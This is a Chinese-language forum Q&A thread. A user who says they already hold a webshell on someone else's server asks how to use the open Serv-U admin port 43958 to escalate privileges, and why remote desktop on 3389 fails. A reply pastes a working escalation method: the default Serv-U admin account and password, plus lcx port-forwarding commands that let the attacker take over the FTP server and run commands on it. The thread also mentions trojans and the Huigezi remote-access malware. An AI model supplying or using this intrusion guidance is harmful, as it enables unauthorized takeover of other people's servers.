高手们进，对方机子的43958端口开了，我在他的C盘上看到了ser-u这个软件了，但是他的21端口关闭

高手们进，

第一个问题：我已经获得一个webshell了，发现对方机子的43958端口开了，我也在他的C盘上看到了serv-u这个软件了，但是他的21端口关闭了，既然开启了serv-u这个软件，为什么21端口会关闭啊？？ 难道是它把ftp服务的21端口换成其他了？？
不知道我想的对不对啊？如果不对，那这是怎么回事。
第二个问题：这种情况下，我该怎么利用43958端口来进一步提权？

第三个问题：对方开启了3389，但他在外网中，并非在内网中，为什么我无法连接到它。我看网上说，连接不了对方的3389的一个原因是，他在内网，但他是外网中啊。

三个问题。问题有点多，我分也不高，但是是诚心求教大家。

谢谢大家啊。。。
我手头没有免杀的马啊，所以不存在占用端口之说。

我开始怀疑它 的3389这个口是不是不是远程桌面登录，而是其他功能用的端口，被管理员偷梁换柱了，而真正的远程桌面登录的端口换成其他了,比如：5000，（5000是我随便举例啊）。。

但是我读取注册表发现，远程桌面端口是3389啊，可是连接不上。。。它又在外网，很奇怪啊。。。。。。。它开着，我为什么无法连接啊。。。，无法理解这一点啊。

至于将43958端口映射的法子，我先尝试一下啊。 比较感谢 网友：网域花生壳

你不会是在用灰鸽子吧？
端口占用的可能性比较大
ftp提权问题，这个很简单摘录一段：
主要内容：利用webshell上传、执行功能，将默认serv-u ftp管理端口映射到外网，通过默认serv-u ftp连接密码，获得系统权限。

关键技术要点：serv-u ftp管理端口映射的详细方法。serv-u默认监听127.0.0.1:43958,serv-u默认管理账号是LocalAdministrator,默认密码是"#l@$ak#.lk;0@P"，在本机才能连接这个管理端口,但是如果我们可以把这个端口转发到我们本机上,通过本机来连接远程主机的自连接端口,我们就能完全接管目标服务器的SERV_U,建立有完全权限的帐号连接上去为所欲为,而在转发过程中我们并不需要有ADMIN的权限,只要有运行端口转发工具的权限就可以了. #l@$ak#.lk;0@P在目标WEBSHELL上运行LCX lcx -slave 你的IP 5000 127.0.0.1 43958在本机上运行 lcx -listen 5000 21打开本地的SERV_U 在IP上填入127.0.0.1 帐号写LocalAdministrator 密码#l@$ak#.lk;0@P此时的连接过程是本机连接21端口------------>转发往本机5000端口-------------->管道连接至远程机5000端口------------>转发至远程43958端口连接成功后,在本机登陆SERV_U就相当于登陆了远程的SERV_U你可以FTP登陆本机IP,输入上面的帐号和密码,在远程FTP服务器上执行命令

你好！ 不要干坏事 希望对你有所帮助，望采纳。